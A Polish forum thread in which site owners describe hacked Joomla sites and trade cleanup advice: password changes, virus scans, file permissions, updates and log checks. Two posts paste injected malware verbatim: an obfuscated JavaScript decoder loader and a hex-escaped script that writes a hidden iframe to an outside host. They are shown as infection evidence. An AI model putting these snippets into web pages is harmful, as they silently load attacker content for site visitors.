Włam do joomla, loader trojanów

[Easer22]

Witam!
Powyższe rozwiązanie mi nie pomogło,może coś źle robię!
W pliku index2.php i index3.php w katalogu administrator znalazłem taki wpis:


<script language=JavaScript>function abban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,29, 6,1,31
21,22,50,42,47,0,0,0,0,0,0,24,32,34,57,58,35,43,51 ,41,2,28,4,44
,13,56,54,26,8,27,62,33,52,53,19,59,38,5,0,0,0,0,3 7,0,15,30,16,36,23,60,
49,45,48,9,10,39,7,61,17,18,40,14,11,12,20,0,46,
55,25,3);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|
=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(175^w&255);w
>>=8;s-=2}else{s=6}}document.write(r)}}abban('WPJ71XLik0Q x1GLdm9nO4e
jAvDjx4RtGkmqg3ltivwMAaBhgs9ngpDCEmFLgQ4fOpDCEJ9hV zFLdyRtx2xLgzR
fO6eCg29f7kmJdWIqgjxhGIFJd')</script> :mad:
pomocy!!

[inkos]

Odgrzebuje troche stary temat ale chce sie podzielic swoim rozwiazaniem. Moim zdaniem jest skuteczne - strona ktora tak uratowalem dziala juz ponad miesiac. I raczej ten problem nie jest to blad Joomli tylko najczesciej "podsluchane" haslo do waszego serwera FTP przez jakiegos szkodnika na waszym komputerze lub "zlosliwa" strone www.

Rozwiazanie jest proste.
Najpierw sprawdzamy czy na swoim komputerze nie mamy zadnych wirusow. Potem logujemy sie do konta zmieniamy ustawienia hasla. Sprawdzamy wszystkie pliki index.php index.html default.html i ich warianty czy na ich koncu nie ma wpisow zaczynajacych sie od <iframe lub <script> - jesli tak to usuwamy. Generalnie do sprawdzenia sa wszystkie pliki w katalogu glownym i podkatalogach (zmienione maja najczesciej ta sama date modyfikacji) ale juz nie w podpodkatalogach. Potem jak juz sprawdzilismy wszystkie pliki zmieniamy chmody plikow na 644 i katalogw na 755 oczywiscie poza tymi ktore musza miec wieksze prawa. A na koniec po raz drugi zmieniamy hasla do Joomli oraz do konta ftp na ktorym jest nasza Joomla.
To powinno pomoc.
Inkos

[kkmm1]

Inkos w moim przypadku jest podobnie ale u mnie jakies 20 domen juz tak dziala ponad rok wiec twoje myslenie jest pewnie jak najbardziej sluszne.

[mirrr]

Kod:

<!-- o -->							<script type="text/javascript">	
<!--				document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%6C%65%76%69%73%69%74%6F%72%2E%6E%65%74%2F%69%6E%2E%63%67%69%3F%32%22%20%77%69%64%74%68%3D%31%30%30%20%68%65%69%67%68%74%3D%31%30%30%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E'))	//-->
</script>
<!-- c -->

To fragment mojego kodu, jaki mi doklejno we wszystkich plikach index.php i index.html. Rozwiązaniem było usunięcie tego fragmentu ze wszystkich plików a konkretnie nadpisanie tych podmienionych orginałami z twardego dysku.
- wysztkie zmodyfikowano o tej samej porze (a dokładnie w odstępie 3 minut, zmiany zostały wykonane o godzinie 17:32:00, 17:33:00 i 17:34:00)
Aby "przetłumaczyć" kod heksadecymalny wystarczy wejść na stronkę http://poczta.pnet.pl/~zajaczek/trivia/unescape.htm gdzie możecie rozkodować kod szesnastkowy. W moim przypadku byla to ramka ze skryptem cgi przekirowującym na stronę Altavista.


Dodatkowo znalazłem jeszcze ten kod w pliku:
/administrator/includes/auth.php
/administrator/templates/joomla_admin/login.php
/components/com_login/login.php
/templates/nazwa_szablonu/css/template_css.css
oraz index.php i login.php w Coopermine.

[inkos]

To fragment mojego kodu, jaki mi doklejno we wszystkich plikach index.php i index.html. Rozwiązaniem było usunięcie tego fragmentu ze wszystkich plików a konkretnie nadpisanie tych podmienionych orginałami z twardego dysku.

Jaką masz wersję Joomla? Jeśli którąś ze starszych to ją zaktualizuj i zastosuj się do rad z mojego postu umieszczonego powyżej w tym wątku.

Jeśli to Joomla z rodziny 1.0.x to wskazana bedzie wkrótce aktualizacja do wersji 1.0.14 która pojawi się niebawem. Do tego czasu zalecam trochę ostrożności i skorzystanie z tej rady: Jeśli jesteś zalogowany do zaplecza swojej witryny to nie otwieraj w przeglądarce innych stron tylko co najwyżej swoją i zaplecze. Po pracy wyczyść cache i dopiero przeglądaj inne witryny. Wiem że to brzmi dziwnie ale po lekturze postów z forum.joomla.org okaże się prawdziwe.

[mard]

Ja chciałem zypytac atakowanych, czy w instalacjach, ktore zostaly zainfekowane obcym kodem odpalone lub zainstalowane sa dodatki:
joomlaboard, forumboard lub jakies inne forum z tej rodziny (nie pamietam poprostu jakie to bylo).

[mirrr]

wersja Joomli to 1.0.13 UTF-8 Ale z tym otwieraniem tylko strony i zaplecza admina t moe by problem z reguły mam otwartych po kilka zakładek A wiadomo już kiedy można się�*spodziewać stabilnej 1.0.14?

Mard, z dodatków, ktore wymieniasz nie mam nic, mam tylko Coopermine i coś mi si�*ę�*wydaje, że tu tkwi problem. Od jakiegoś czasu dostaję mnóstwo mail o rejestracji w galerii.

[mard]

a czy ktos przegladal logi serwera, zeby ustalic co spowodowalo includowanie wlasnego kodu i poskudkowalo podmianom pliku ?? moze w ten sposob dojdziemy co powoduje ten klopot. Ja tym sposobem znalazlem wlasnie kiedy dziure w forum.

[inkos]

Ja chciałem zypytac atakowanych, czy w instalacjach, ktore zostaly zainfekowane obcym kodem odpalone lub zainstalowane sa dodatki.

U jednego z moich "klientów" była czysta Joomla beż żadnych dodatków ale i tak padła ofiarą. Po analizie logów i lokalnego komputera okazało się że winowajcą był Trojan który "podsłuchał" hasła. Logi servka były czyste. Po prostu "ktoś/coś" zalogowało się o konkretnej godzinie do konta FTP z IP pochodzącego z Rosji i dokonało zmian. Takie "wizyty" były dość "popularne" pod koniec ubiegłego roku i zostały omówione na forum.joomla.org w "Security".

[mard]

aha. czyli tak naprawde sam powod problemu nie byl w joomli tylko w wirusie ladowanym dzieki joomli ?? tak to rozumiem ??